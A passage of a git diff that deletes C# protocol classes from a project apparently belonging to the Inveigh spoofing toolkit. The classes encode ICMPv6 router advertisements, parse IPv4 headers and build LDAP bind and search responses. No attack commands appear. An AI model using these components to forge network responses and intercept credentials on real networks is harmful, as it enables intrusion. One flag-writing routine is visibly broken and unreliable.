INTERRUPTION) HOWEVER - * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, - * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE - * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. - */ -using Quiddity.Support; -using System; -using System.Collections.Generic; -using System.IO; -using System.Linq; -using System.Text; - -namespace Quiddity.ICMPv6 -{ - class ICMPv6RouterAdvertisement - { - // https://datatracker.ietf.org/doc/html/rfc4861#section-4.2 - public byte Type { get; set; } - public byte Code { get; set; } - public ushort Checksum { get; set; } - public byte CurHopLimit { get; set; } - public bool M{ get; set; } // 1 bit - public bool O { get; set; } // 1 bit - public string Reserved { get; set; } // 6 bits - public ushort RouterLifeTime { get; set; } - public uint ReachableTime { get; set; } - public uint RetransTimer { get; set; } - public byte[] Options { get; set; } - - // custom fields - public byte Flags { get; set; } - - public ICMPv6RouterAdvertisement() - { - this.Type = 134; - this.Code = 0; - this.Checksum = 0; - this.Flags = 0; - this.RouterLifeTime = 0; - this.ReachableTime = 0; - this.RetransTimer = 0; - } - - public byte[] GetBytes() - { - - using (MemoryStream memoryStream = new MemoryStream()) - { - PacketWriter packetWriter = new PacketWriter(memoryStream); - packetWriter.Write(this.Type); - packetWriter.Write(this.Code); - packetWriter.Write(this.Checksum); - packetWriter.Write(this.CurHopLimit); - packetWriter.Write(this.Flags); - packetWriter.BigEndianWrite(this.RouterLifeTime); - packetWriter.BigEndianWrite(this.ReachableTime); - packetWriter.BigEndianWrite(this.RetransTimer); - - if (!Utilities.ArrayIsNullOrEmpty(Options)) - { - packetWriter.Write(this.Options); - } - - return memoryStream.ToArray(); - } - - } - - protected virtual void WriteFlags() - { - string flags = this.M ? "1" : "0"; - flags += this.O ? "1" : "0"; - flags += this.Reserved; - - for (int i = 0; i < 2; ++i) - { - this.Flags = Convert.ToByte(flags.Substring(8 * i, 8), 1); ; - } - } - } -} diff --git a/Inveigh/Protocols/Quiddity/Protocols/ICMPv6/Options/ICMPv6DNSSearchList.cs b/Inveigh/Protocols/Quiddity/Protocols/ICMPv6/Options/ICMPv6DNSSearchList.cs deleted file mode 100644 index 7eef831..0000000 --- a/Inveigh/Protocols/Quiddity/Protocols/ICMPv6/Options/ICMPv6DNSSearchList.cs +++ /dev/null @@ -1,43 +0,0 @@ -using System; -using System.Collections.Generic; -using System.IO; -using System.Linq; -using System.Text; - -namespace Quiddity.ICMPv6 -{ - class ICMPv6DNSSearchList - { - // https://datatracker.ietf.org/doc/html/rfc8106 - public byte Type { get; set; } - public byte Length { get; set; } - public ushort Reserved { get; set; } - public uint Lifetime { get; set; } - public byte[] DomainNames { get; set; } - - public ICMPv6DNSSearchList() - { - this.Type = 31; - this.Length = 0; - this.Reserved = 0; - this.Lifetime = 0; - } - - public byte[] GetBytes() - { - - using (MemoryStream memoryStream = new MemoryStream()) - { - PacketWriter packetWriter = new PacketWriter(memoryStream); - packetWriter.Write(this.Type); - packetWriter.Write(this.Length); - packetWriter.Write(this.Reserved); - packetWriter.BigEndianWrite(this.Lifetime); - packetWriter.Write(this.DomainNames); - return memoryStream.ToArray(); - } - - } - - } -} diff --git a/Inveigh/Protocols/Quiddity/Protocols/ICMPv6/Options/ICMPv6RecursiveDNS.cs b/Inveigh/Protocols/Quiddity/Protocols/ICMPv6/Options/ICMPv6RecursiveDNS.cs deleted file mode 100644 index 2fa9f31..0000000 --- a/Inveigh/Protocols/Quiddity/Protocols/ICMPv6/Options/ICMPv6RecursiveDNS.cs +++ /dev/null @@ -1,73 +0,0 @@ -/* - * BSD 3-Clause License - * - * Copyright (c) 2021, Kevin Robertson - * All rights reserved. - * - * Redistribution and use in source and binary forms, with or without - * modification, are permitted provided that the following conditions are met: - * - * 1. Redistributions of source code must retain the above copyright notice, this - * list of conditions and the following disclaimer. - * - * 2. Redistributions in binary form must reproduce the above copyright notice, - * this list of conditions and the following disclaimer in the documentation - * and/or other materials provided with the distribution. - * - * 3. Neither the name of the copyright holder nor the names of its - * contributors may be used to endorse or promote products derived from - * this software without specific prior written permission. - * - * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" - * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE - * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE - * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE - * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL - * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR - * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER - * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, - * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE - * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. - */ -using System; -using System.Collections.Generic; -using System.IO; -using System.Linq; -using System.Text; - -namespace Quiddity.ICMPv6 -{ - class ICMPv6RecursiveDNS - { - // https://datatracker.ietf.org/doc/html/rfc5006#section-5.1 - public byte Type { get; set; } - public byte Length { get; set; } - public ushort Reserved { get; set; } - public uint Lifetime { get; set; } - public byte[] RecursiveDNSServers { get; set; } - - public ICMPv6RecursiveDNS() - { - this.Type = 25; - this.Length = 0; - this.Reserved = 0; - this.Lifetime = 0; - } - - public byte[] GetBytes() - { - - using (MemoryStream memoryStream = new MemoryStream()) - { - PacketWriter packetWriter = new PacketWriter(memoryStream); - packetWriter.Write(this.Type); - packetWriter.Write(this.Length); - packetWriter.Write(this.Reserved); - packetWriter.BigEndianWrite(this.Lifetime); - packetWriter.Write(this.RecursiveDNSServers); - return memoryStream.ToArray(); - } - - } - } -} diff --git a/Inveigh/Protocols/Quiddity/Protocols/IP/IPHeader.cs b/Inveigh/Protocols/Quiddity/Protocols/IP/IPHeader.cs deleted file mode 100644 index 80194ab..0000000 --- a/Inveigh/Protocols/Quiddity/Protocols/IP/IPHeader.cs +++ /dev/null @@ -1,81 +0,0 @@ -/* - * BSD 3-Clause License - * - * Copyright (c) 2021, Kevin Robertson - * All rights reserved. - * - * Redistribution and use in source and binary forms, with or without - * modification, are permitted provided that the following conditions are met: - * - * 1. Redistributions of source code must retain the above copyright notice, this - * list of conditions and the following disclaimer. - * - * 2. Redistributions in binary form must reproduce the above copyright notice, - * this list of conditions and the following disclaimer in the documentation - * and/or other materials provided with the distribution. - * - * 3. Neither the name of the copyright holder nor the names of its - * contributors may be used to endorse or promote products derived from - * this software without specific prior written permission. - * - * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" - * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE - * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE - * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE - * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL - * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR - * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER - * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, - * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE - * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. - */ -using System; -using System.IO; -using System.Net; - -namespace Quiddity.IP -{ - class IPHeader - { - // https://datatracker.ietf.org/doc/html/rfc791#section-3.1 - public int Version { get; set; } - public int IHL { get; set; } - public byte TypeOfService { get; set; } - public ushort TotalLength { get; set; } - public ushort Identification { get; set; } - public string Flags { get; set; } - public int FragmentOffset { get; set; } - public byte TimeToLive { get; set; } - public byte Protocol { get; set; } - public ushort HeaderChecksum { get; set; } - public IPAddress SourceAddress { get; set; } - public IPAddress DestinationAddress { get; set; } - public byte[] Options { get; set; } - public byte[] Padding { get; set; } - - public void ReadBytes(byte[] data, int position) - { - - using (MemoryStream memoryStream = new MemoryStream(data)) - { - PacketReader packetReader = new PacketReader(memoryStream); - memoryStream.Position = position; - string versionIHL = packetReader.ReadBinary(1); - this.Version = Convert.ToInt32(versionIHL.Substring(0, 4), 2); - this.IHL = Convert.ToInt32(versionIHL.Substring(4, 4), 2) * 4; - this.TypeOfService = packetReader.ReadByte(); - this.TotalLength = packetReader.BigEndianReadUInt16(); - this.Identification = packetReader.BigEndianReadUInt16(); - string flagsFragmentOffset = packetReader.ReadBinary(2); - this.Flags = flagsFragmentOffset.Substring(0, 3); - this.FragmentOffset = Convert.ToInt32(flagsFragmentOffset.Substring(3, 13), 2); - this.TimeToLive = packetReader.ReadByte(); - this.Protocol = packetReader.ReadByte(); - this.HeaderChecksum = packetReader.BigEndianReadUInt16(); - this.SourceAddress = new IPAddress(packetReader.ReadBytes(4)); - this.DestinationAddress = new IPAddress(packetReader.ReadBytes(4)); - } - - } - } -} diff --git a/Inveigh/Protocols/Quiddity/Protocols/LDAP/LDAPMessage.cs b/Inveigh/Protocols/Quiddity/Protocols/LDAP/LDAPMessage.cs deleted file mode 100644 index 18445ba..0000000 --- a/Inveigh/Protocols/Quiddity/Protocols/LDAP/LDAPMessage.cs +++ /dev/null @@ -1,182 +0,0 @@ -/* - * BSD 3-Clause License - * - * Copyright (c) 2021, Kevin Robertson - * All rights reserved. - * - * Redistribution and use in source and binary forms, with or without - * modification, are permitted provided that the following conditions are met: - * - * 1. Redistributions of source code must retain the above copyright notice, this - * list of conditions and the following disclaimer. - * - * 2. Redistributions in binary form must reproduce the above copyright notice, - * this list of conditions and the following disclaimer in the documentation - * and/or other materials provided with the distribution. - * - * 3. Neither the name of the copyright holder nor the names of its - * contributors may be used to endorse or promote products derived from - * this software without specific prior written permission. - * - * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" - * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE - * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE - * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE - * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL - * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR - * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER - * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, - * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE - * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. - */ -using System; -using System.Collections.Generic; -using System.Linq; -using System.Text; -using System.DirectoryServices.Protocols; -using Quiddity.Support; - -namespace Quiddity.LDAP -{ - // https://datatracker.ietf.org/doc/html/rfc2251#section-4.2 - class LDAPMessage - { - public int MessageID { get; set; } - public object ProtocolOp { get; set; } - public byte[] Controls { get; set; } - - //custom - - public int Tag { get; set; } - - public byte[] Encode() - { - return BerConverter.Encode("{iX}", this.MessageID, this.ProtocolOp); - } - - public byte[] Encode(int type) - { - - switch (type) - { - - case 3: - { - LDAPBindResponse protocolOp = (LDAPBindResponse)this.ProtocolOp; - return BerConverter.Encode("{it{eooto}}", this.MessageID, 0x61, protocolOp.ResultCode, protocolOp.MatchedDN, protocolOp.DiagnosticMessage, 0x87, protocolOp.ServerSaslCreds); - } - - case 4: - { - LDAPSearchResEntry protocolOp = (LDAPSearchResEntry)this.ProtocolOp; - return BerConverter.Encode("{it{sto}}", this.MessageID, 0x64, protocolOp.ObjectDN, 0x30, protocolOp.Attributes); - } - - case 5: - { - LDAPSearchResDone protocolOp = (LDAPSearchResDone)this.ProtocolOp; - return BerConverter.Encode("{it{eoo}}", this.MessageID, 0x65, protocolOp.ResultCode, protocolOp.MatchedDN, protocolOp.ErrorMessage); - } - - } - - return null; - } - - public byte[] Encode(LDAPSearchResDone resdone) - { - return BerConverter.Encode("{it{eoo}}", this.MessageID, 0x65, resdone.ResultCode, resdone.MatchedDN, resdone.ErrorMessage); - } - - public byte[] Encode(LDAPSearchResEntry search) - { - return BerConverter.Encode("{it{stX}}", this.MessageID, 0x64, search.ObjectDN, 0x30, search.Attributes); - } - - public void Decode(byte[] data) - { - this.Tag = GetMessageType(data); - object[] message = BerConverter.Decode("{iV}", data); - this.MessageID = (int)message[0]; - this.ProtocolOp = message[1]; - } - - public static int GetLength(int index, byte[] data) - { - int length = 0; - - switch (data[index]) - { - - case 0x84: - { - index++; - byte[] valueLength = new byte[4]; - Buffer.BlockCopy(data, index, valueLength, 0, 4); - Array.Reverse(valueLength); - length = BitConverter.ToInt32(valueLength, 0); - length += 4; - } - break; - - } - - return length; - } - - public static int GetMessageType(byte[]data) - { - int type = -1; - int index = 1; - byte tag; - int valueLength = data[index++]; - - if ((valueLength & 0x80) == 0x80) - { - int length = valueLength & 0x7f; - valueLength = 0; - - for (int i = 0; i < length; i++) - { - valueLength = valueLength * 256 + data[index++]; - } - - } - else - { - index += valueLength; - } - - index++; - valueLength = data[index]; - - if ((valueLength & 0x80) == 0x80) - { - int length = valueLength & 0x7f; - valueLength = 0; - - for (int i = 0; i < length; i++) - { - valueLength = valueLength * 256 + data[index++]; - } - - } - else - { - index += valueLength; - } - - index++; - tag = data[index]; - - if ((tag & 0x60) == 0x60 || (tag & 0x40) == 0x40) - { - type = tag & 0x1f; - } - - return type; - } - - } - -} diff --git a/Inveigh/Protocols/Quiddity/Protocols/LDAP/ProtocolOp/LDAPBindRequest.cs b/Inveigh/Protocols/Quiddity/Protocols/LDAP/ProtocolOp/LDAPBindRequest.cs deleted file mode 100644 index 8d10047..0000000 --- a/Inveigh/Protocols/Quiddity/Protocols/LDAP/ProtocolOp/LDAPBindRequest.cs +++ /dev/null @@ -1,23 +0,0 @@ -using System; -using System.Collections.Generic; -using System.Linq; -using System.Text; - -namespace Quiddity.LDAP -{ - class LDAPBindRequest - { - public byte[] Version { get; set; } - public byte[] Name { get; set; } - public byte[] Authentication { get; set; } - - public void ReadBytes(byte[][] Data) - { - this.Version = (byte[])Data.GetValue(0); - this.Name = (byte[])Data.GetValue(1); - this.Authentication = (byte[])Data.GetValue(2); - } - - } - -} diff --git a/Inveigh/Protocols/Quiddity/Protocols/LDAP/ProtocolOp/LDAPBindResponse.cs b/Inveigh/Protocols/Quiddity/Protocols/LDAP/ProtocolOp/LDAPBindResponse.cs deleted file mode 100644 index 26720cd..0000000 --- a/Inveigh/Protocols/Quiddity/Protocols/LDAP/ProtocolOp/LDAPBindResponse.cs +++ /dev/null @@ -1,18 +0,0 @@ -using System; -using System.Collections.Generic; -using System.Linq; -using System.Text; - -namespace Quiddity.LDAP -{ - class LDAPBindResponse : LDAPResult - { - public byte[] ServerSaslCreds { get; set; } - - public LDAPBindResponse() - { - this.ResultCode = 14; - } - - } -} diff --git a/Inveigh/Protocols/Quiddity/Protocols/LDAP/ProtocolOp/LDAPPartialAttributeList.cs b/Inveigh/Protocols/Quiddity/Protocols/LDAP/ProtocolOp/LDAPPartialAttributeList.cs deleted file mode 100644 index 43f565b..0000000 --- a/Inveigh/Protocols/Quiddity/Protocols/LDAP/ProtocolOp/LDAPPartialAttributeList.cs +++ /dev/null @@ -1,13 +0,0 @@ -using System; -using System.Collections.Generic; -using System.Linq; -using System.Text; - -namespace Quiddity.LDAP -{ - class LDAPPartialAttributeList - { - public string Type { get; set; } - public string[] Vals { get; set; } - } -} diff --git a/Inveigh/Protocols/Quiddity/Protocols/LDAP/ProtocolOp/LDAPSearchRequest.cs b/Inveigh/Protocols/Quiddity/Protocols/LDAP/ProtocolOp/LDAPSearchRequest.cs deleted file mode 100644 index ee697b7..0000000 --- a/Inveigh/Protocols/Quiddity/Protocols/LDAP/ProtocolOp/LDAPSearchRequest.cs +++ /dev/null @@ -1,46 +0,0 @@ -using Quiddity.Support; -using System; -using System.Collections.Generic; -using System.DirectoryServices.Protocols; -using System.IO; -using System.Linq; -using System.Text; - -namespace Quiddity.LDAP -{ - class LDAPSearchRequest - { - public byte[] BaseObject { get; set; } - public byte[] Scope { get; set; } - public byte[] DerefAliases { get; set; } - public byte[] SizeLimit { get; set; } - public byte[] TimeLimit { get; set; } - public byte[] TypesOnly { get; set; } - public byte[] Filter { get; set; } - public string[] Attributes { get; set; } - - public void ReadBytes(byte[][] Data) - { - this.BaseObject = (byte[])Data.GetValue(0); - this.Scope = (byte[])Data.GetValue(1); - this.DerefAliases = (byte[])Data.GetValue(2); - this.SizeLimit = (byte[])Data.GetValue(3); - this.TimeLimit = (byte[])Data.GetValue(4); - this.TypesOnly = (byte[])Data.GetValue(5); - this.Filter = (byte[])Data.GetValue(6); - this.Attributes = ASN1.DecodeOctetStringArray((byte[])Data.GetValue(7)); - } - - public object[] Decode(byte[] Data) - { - return BerConverter.Decode("{OiiiiiOO}", Data); - } - - public object[] Decode2(byte[] Data) - { - return BerConverter.Decode("{B}", Data); - } - - } - -} diff --git a/Inveigh/Protocols/Quiddity/Protocols/LDAP/ProtocolOp/LDAPSearchResDone.cs b/Inveigh/Protocols/Quiddity/Protocols/LDAP/ProtocolOp/LDAPSearchResDone.cs deleted file mode 100644 index a62f9a5..0000000 --- a/Inveigh/Protocols/Quiddity/Protocols/LDAP/ProtocolOp/LDAPSearchResDone.cs +++ /dev/null @@ -1,22 +0,0 @@ -using System; -using System.Collections.Generic; -using System.Linq; -using System.Text; -using System.DirectoryServices.Protocols; - -namespace Quiddity.LDAP -{ - class LDAPSearchResDone - { - public int ResultCode { get; set; } - public byte[] MatchedDN { get; set; } - public byte[] ErrorMessage { get; set; } - - public byte[] Encode() - { - return BerConverter.Encode("t{eoo}", 0x65, this.ResultCode, this.MatchedDN, this.ErrorMessage); ; - } - - } - -} diff --git a/Inveigh/Protocols/Quiddity/Protocols/LDAP/ProtocolOp/LDAPSearchResEntry.cs b/Inveigh/Protocols/Quiddity/Protocols/LDAP/ProtocolOp/LDAPSearchResEntry.cs deleted file mode 100644 index c1a6f1e..0000000 --- a/Inveigh/Protocols/Quiddity/Protocols/LDAP/ProtocolOp/LDAPSearchResEntry.cs +++ /dev/null @@ -1,25 +0,0 @@ -using System; -using System.Collections.Generic; -using System.DirectoryServices.Protocols; -using System.Linq; -using System.Text; - -namespace Quiddity.LDAP -{ - class LDAPSearchResEntry - { - public string ObjectDN { get; set; } - public byte[] Attributes { get; set; } - - public byte[] Encode() - { - return BerConverter.Encode("t{stX}", new object[] { 0x64, this.ObjectDN, 0x30, this.Attributes } ); - } - - public byte[] Encode(Object[] Segment) - { - return BerConverter.Encode("t{s{V}}", 0x64, this.ObjectDN, Segment); - } - - } -} diff --git a/Inveigh/Protocols/Quiddity/Protocols/LDAP/Values/LDAPResult.cs b/Inveigh/Protocols/Quiddity/Protocols/LDAP/Values/LDAPResult.cs deleted file mode 100644 index 5d53155..0000000 --- a/Inveigh/Protocols/Quiddity/Protocols/LDAP/Values/LDAPResult.cs +++ /dev/null @@ -1,46 +0,0 @@ -/* - * BSD 3-Clause License - * - * Copyright (c) 2021, Kevin Robertson - * All rights reserved. - * - * Redistribution and use in source and binary forms, with or without - * modification, are permitted provided that the following conditions are met: - * - * 1. Redistributions of source code must retain the above copyright notice, this - * list of conditions and the following disclaimer. - * - * 2. Redistributions in binary form must reproduce the above copyright notice, - * this list of conditions and the following disclaimer in the documentation - * and/or other materials provided with the distribution. - * - * 3. Neither the name of the copyright holder nor the names of its - * contributors may be used to endorse or promote products derived from - * this software without specific prior written permission. - * - * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" - * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE - * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE - * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE - * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL - * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR - * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER - * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, - * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE - * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. - */ -using System; -using System.Collections.Generic; -using System.Linq; -using System.Text; - -namespace Quiddity.LDAP -{ - class LDAPResult - { - public int ResultCode { get; set; } - public byte[] MatchedDN { get; set; } - public byte[] DiagnosticMessage { get; set; } - - } -} diff --git a/Inveigh/Protocols/Quiddity/Protocols/LDAP/Values/LDAPSaslCredentials.cs b/Inveigh/Protocols/Quiddity/Protocols/LDAP/Values/LDAPSaslCredentials.cs deleted file mode 100644 index a9f9670..0000000 --- a/Inveigh/Protocols/Quiddity/Protocols/LDAP/Values/LDAPSaslCredentials.cs +++ /dev/null @@ -1,52 +0,0 @@ -/* - * BSD 3-Clause License - * - * Copyright (c) 2021, Kevin Robertson - * All rights reserved. - * - * Redistribution and use in source and binary forms, with or without - * modification, are permitted provided that the following conditions are met: - * - * 1. Redistributions of source code must retain the above copyright notice, this - * list of conditions and the following disclaimer. - * - * 2. Redistributions in binary form must reproduce the above copyright notice, - * this list of conditions and the following disclaimer in the documentation - * and/or other materials provided with the distribution. - * - * 3. Neither the name of the copyright holder nor the names of its - * contributors may be used to endorse or promote products derived from - * this software without specific prior written permission. - * - * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" - * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE - * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE - * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE - * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL - * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR - * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER - * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, - * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE - * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. - */ -using Quiddity.Support; -using System; -using System.Collections.Generic; -using System.Linq; -using System.Text; - -namespace Quiddity.LDAP -{ - class LDAPSaslCredentials - { - public string Mechanism { get; set; } - public byte[] Credentials { get; set; } - - public void ReadBytes(byte[] Data) - { - this.Mechanism = Encoding.UTF8.GetString(ASN1.GetTagBytes(4, Data)); - this.Credentials = ASN1.GetTagBytes(4, Data, ASN1.GetLength(1, Data)); - } - - } -} diff --git a/Inveigh/Protocols/Quiddity/Protocols/LDAP/Values/LDAPSupportedCapabilities.cs b/Inveigh/Protocols/Quiddity/Protocols/LDAP/Values/LDAPSupportedCapabilities.cs deleted file mode 100644 index 087889b..0000000 --- a/Inveigh/Protocols/Quiddity/Protocols/LDAP/Values/LDAPSupportedCapabilities.cs +++ /dev/null @@ -1,55 +0,0 @@ -/* - * BSD 3-Clause License - * - * Copyright (c) 2021, Kevin Robertson - * All rights reserved. - * - * Redistribution and use in source and binary forms, with or without - * modification, are permitted provided that the following conditions are met: - * - * 1. Redistributions of source code must retain the above copyright notice, this - * list of conditions and the following disclaimer. - * - * 2. Redistributions in binary form must reproduce the above copyright notice, - * this list of conditions and the following disclaimer in the documentation - * and/or other materials provided with the distribution. - * - * 3. Neither the name of the copyright holder nor the names of its - * contributors may be used to endorse or promote products derived from - * this software without specific prior written permission. - * - * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" - * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE - * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE - * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE - * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL - * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR - * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER - * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, - * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE - * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. - */ -using System; -using System.Collections.Generic; -using System.DirectoryServices.Protocols; -using System.Linq; -using System.Text; - -namespace Quiddity.LDAP -{ - class LDAPSupportedCapabilities : LDAPPartialAttributeList - { - - public LDAPSupportedCapabilities() - { - this.Type = "supportedCapabilities"; - this.Vals = new string[] { "1.2.840.113556.1.4.800", "1.2.840.113556.1.4.1670", "1.2.840.113556.1.4.1791", "1.2.840.113556.1.4.1935", "1.2.840.113556.1.4.2080", "1.2.840.113556.1.4.2237" }; - } - - public byte[] Encode() - { - return BerConverter.Encode("{st{v}}", this.Type, 0x31, this.Vals); - } - - } -} diff --git a/Inveigh/Protocols/Quiddity/Protocols/LDAP/Values/LDAPSupportedSASLMechanisms.cs b/Inveigh/Protocols/Quiddity/Protocols/LDAP/Values/LDAPSupportedSASLMechanisms.cs deleted file mode 100644 index 3db038e..0000000 --- a/Inveigh/Protocols/Quiddity/Protocols/LDAP/Values/LDAPSupportedSASLMechanisms.cs +++ /dev/null @@ -1,56 +0,0 @@ -/* - * BSD 3-Clause License - * - * Copyright (c) 2021, Kevin Robertson - * All rights reserved. - * - * Redistribution and use in source and binary forms, with or without - * modification, are permitted provided that the following conditions are met: - * - * 1. Redistributions of source code must retain the above copyright notice, this - * list of conditions and the following disclaimer. - * - * 2. Redistributions in binary form must reproduce the above copyright notice, - * this list of conditions and the following disclaimer in the documentation - * and/or other materials provided with the distribution. - * - * 3. Neither the name of the copyright holder nor the names of its - * contributors may be used to endorse or promote products derived from - * this software without specific prior written permission. - * - * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" - * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE - * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE - * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE - * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL - * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR - * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER - * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, - * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE - * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. - */ -using Quiddity.LDAP; -using System; -using System.Collections.Generic; -using System.DirectoryServices.Protocols; -using System.Linq; -using System.Text; - -namespace Quiddity.LDAP -{ - class LDAPSupportedSASLMechanisms : LDAPPartialAttributeList - { - - public LDAPSupportedSASLMechanisms() - { - this.Type = "supportedSASLMechanisms"; - this.Vals = new string[] { "GSSAPI", "GSS-SPNEGO", "EXTERNAL", "DIGESTMD5" }; - } - - public byte[] Encode() - { - return BerConverter.Encode("{st{v}}", this.Type, 0x31, this.Vals); - } - - } -} diff --git a/Inveigh/Protocols/Quiddity/Protocols/LLMNR/LLMNRChecker.cs b/Inveigh/Protocols/Quiddity/Protocols/LLMNR/LLMNRChecker.cs deleted file mode 100644 index c1ca969..0000000 --- a/Inveigh/Protocols/Quiddity/Protocols/LLMNR/LLMNRChecker.cs +++ /dev/null @@ -1,41 +0,0 @@ -/* - * BSD 3-Clause License - * - * Copyright (c) 2021, Kevin Robertson - * All rights reserved. - * - * Redistribution and use in source and binary forms, with or without - * modification, are permitted provided that the following conditions are met: - * - * 1. Redistributions of 